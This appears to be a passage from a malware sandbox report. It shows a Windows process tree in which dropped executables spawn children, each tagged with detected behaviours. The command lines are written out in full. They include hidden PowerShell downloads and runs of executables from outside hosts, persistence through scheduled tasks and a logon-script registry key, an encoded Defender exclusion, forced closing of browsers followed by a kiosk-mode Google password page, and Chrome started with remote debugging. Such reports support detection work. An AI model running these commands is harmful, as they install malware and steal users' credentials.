C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10232140121\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\SysWOW64\timeout.exetimeout /t 26⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5432 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:5052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:5860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "CUQjymagMKX" /tr "mshta \"C:\Temp\8Gq0M3TmV.hta\"" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1688
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\8Gq0M3TmV.hta"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3372
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10232340101\FnJ67k2.exe"C:\Users\Admin\AppData\Local\Temp\10232340101\FnJ67k2.exe"5⤵
- Executes dropped EXE
PID:3076 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:2148
-
-
-
C:\Users\Admin\AppData\Local\Temp\10232410101\dbe09a8462.exe"C:\Users\Admin\AppData\Local\Temp\10232410101\dbe09a8462.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6036 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4228
-
-
-
C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3824 -
C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"6⤵
- Executes dropped EXE
PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"6⤵
- Executes dropped EXE
PID:876
-
-
C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\10232430101\FnJ67k2.exe"C:\Users\Admin\AppData\Local\Temp\10232430101\FnJ67k2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4780 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
-
C:\Users\Admin\AppData\Local\Temp\10232450101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10232450101\ADFoyxP.exe"5⤵
- Executes dropped EXE
PID:2888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c "Invoke-WebRequest -Uri 'https://safetyingold.com/share/4822aa372544ea4642142339b22d22421d08bdb543cd2de334b3fd0e5fc07565.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe' -Headers @{'User-Agent'='build2'}"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe'"6⤵
- Command and Scripting Interpreter: PowerShell
- Registers new Windows logon scripts automatically executed at logon.
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2196 -
C:\Windows\Temp\{582A55AA-9094-46D8-A87C-799AEE030E9A}\.cr\rsfff01fff.exe"C:\Windows\Temp\{582A55AA-9094-46D8-A87C-799AEE030E9A}\.cr\rsfff01fff.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe" -burn.filehandle.attached=660 -burn.filehandle.self=6687⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4992 -
C:\Windows\Temp\{A0F42E5E-798A-4934-9C43-A265C454AA02}\.ba\irestore.exeC:\Windows\Temp\{A0F42E5E-798A-4934-9C43-A265C454AA02}\.ba\irestore.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:588 -
C:\Users\Admin\AppData\Roaming\DownloadscanRs\irestore.exeC:\Users\Admin\AppData\Roaming\DownloadscanRs\irestore.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1788 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe10⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\monUninstall.exeC:\Users\Admin\AppData\Local\Temp\monUninstall.exe11⤵
- Loads dropped DLL
PID:2356 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"12⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5884 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x140,0x16c,0x7ffe2bfadcf8,0x7ffe2bfadd04,0x7ffe2bfadd1013⤵PID:6408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1596,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2160 /prefetch:313⤵PID:6332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2124,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2032 /prefetch:213⤵PID:6344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2396,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2556 /prefetch:813⤵PID:6500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3264 /prefetch:113⤵PID:6468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3284 /prefetch:113⤵PID:6460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4300,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3868 /prefetch:213⤵PID:6616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4304,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4700 /prefetch:113⤵PID:5748
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10232460101\packed.exe"C:\Users\Admin\AppData\Local\Temp\10232460101\packed.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Enumerates system info in registry
PID:2400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5480
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /tn "SystemHelperTask" /tr "C:\Users\Admin\AppData\Local\Temp\10232460101\packed.exe" /sc onlogon /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:3972
-
-
C:\Program Files\RuntimeApp\0000023991.exe"C:\Program Files\RuntimeApp\0000023991.exe"6⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4908
-
-
-
C:\Users\Admin\AppData\Local\Temp\10232470101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10232470101\HmngBpR.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5600 -
C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1860 -
C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:3376 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:3920 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1928
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10232480101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10232480101\zY9sqWs.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3944 -
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4328
-
-
-
C:\Users\Admin\AppData\Local\Temp\10232490101\3c203fabe0.exe"C:\Users\Admin\AppData\Local\Temp\10232490101\3c203fabe0.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
C:\Users\Admin\AppData\Local\Temp\10232500101\3f0728ca94.exe"C:\Users\Admin\AppData\Local\Temp\10232500101\3f0728ca94.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5868
-
-
C:\Users\Admin\AppData\Local\Temp\10232510101\7bf490c150.exe"C:\Users\Admin\AppData\Local\Temp\10232510101\7bf490c150.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
C:\Users\Admin\AppData\Local\Temp\10232520101\c444958f86.exe"C:\Users\Admin\AppData\Local\Temp\10232520101\c444958f86.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3252 -
C:\Users\Admin\AppData\Local\Temp\0F49D2ABOTI6D55J31ZZZ7.exe"C:\Users\Admin\AppData\Local\Temp\0F49D2ABOTI6D55J31ZZZ7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2396
-
-
-
C:\Users\Admin\AppData\Local\Temp\10232530101\84f585a84f.exe"C:\Users\Admin\AppData\Local\Temp\10232530101\84f585a84f.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4752
-
-
C:\Users\Admin\AppData\Local\Temp\10232540101\0982cdebf5.exe"C:\Users\Admin\AppData\Local\Temp\10232540101\0982cdebf5.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4516 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:1496
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1932 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2032 -prefsLen 27099 -prefMapHandle 2036 -prefMapSize 270279 -ipcHandle 2112 -initialChannelId {b802ae4a-7e18-4075-a5a5-33958d46d85e} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu8⤵PID:5548
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2516 -prefsLen 27135 -prefMapHandle 2520 -prefMapSize 270279 -ipcHandle 2528 -initialChannelId {8f698dca-d001-4816-be45-b0bf019547f9} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket8⤵PID:3864
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3828 -prefsLen 25164 -prefMapHandle 3832 -prefMapSize 270279 -jsInitHandle 3836 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3844 -initialChannelId {7fb01fd3-ba47-4256-9720-b5c815baf4f8} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab8⤵
- Checks processor information in registry
PID:3484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4028 -prefsLen 27276 -prefMapHandle 4032 -prefMapSize 270279 -ipcHandle 4100 -initialChannelId {953c7db1-e61c-4650-a683-e26f25306964} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd8⤵PID:5704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3116 -prefsLen 34775 -prefMapHandle 3268 -prefMapSize 270279 -jsInitHandle 3272 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3132 -initialChannelId {7e310782-3a74-41ca-8946-e48d91ac75de} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab8⤵
- Checks processor information in registry
PID:4916
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5136 -prefsLen 35012 -prefMapHandle 5160 -prefMapSize 270279 -ipcHandle 5168 -initialChannelId {6710b37e-fae9-4eb7-a432-c91e4d28c085} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility8⤵
- Checks processor information in registry
PID:7244
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5396 -prefsLen 32952 -prefMapHandle 5400 -prefMapSize 270279 -jsInitHandle 5404 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5412 -initialChannelId {b2db260d-0039-4508-ae40-d620c622951b} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab8⤵
- Checks processor information in registry
PID:7452
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5472 -prefsLen 32952 -prefMapHandle 5468 -prefMapSize 270279 -jsInitHandle 5464 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2988 -initialChannelId {cafe6cb7-97fa-4b90-8df7-b156d2f8e0ff} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab8⤵
- Checks processor information in registry
PID:7572
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5760 -prefsLen 32952 -prefMapHandle 5764 -prefMapSize 270279 -jsInitHandle 5768 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5776 -initialChannelId {f293f06d-e3fd-4876-8d74-2a328d635223} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab8⤵
- Checks processor information in registry
PID:7584
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10232550101\baf2e63155.exe"C:\Users\Admin\AppData\Local\Temp\10232550101\baf2e63155.exe"5⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7188
-
-
C:\Users\Admin\AppData\Local\Temp\10232560101\affbf8475a.exe"C:\Users\Admin\AppData\Local\Temp\10232560101\affbf8475a.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Users\Admin\AppData\Local\Temp\EOQAPR57ODIFE70BDKFTZDQP.exe"C:\Users\Admin\AppData\Local\Temp\EOQAPR57ODIFE70BDKFTZDQP.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""3⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffe373cdcf8,0x7ffe373cdd04,0x7ffe373cdd104⤵PID:3176
-
-
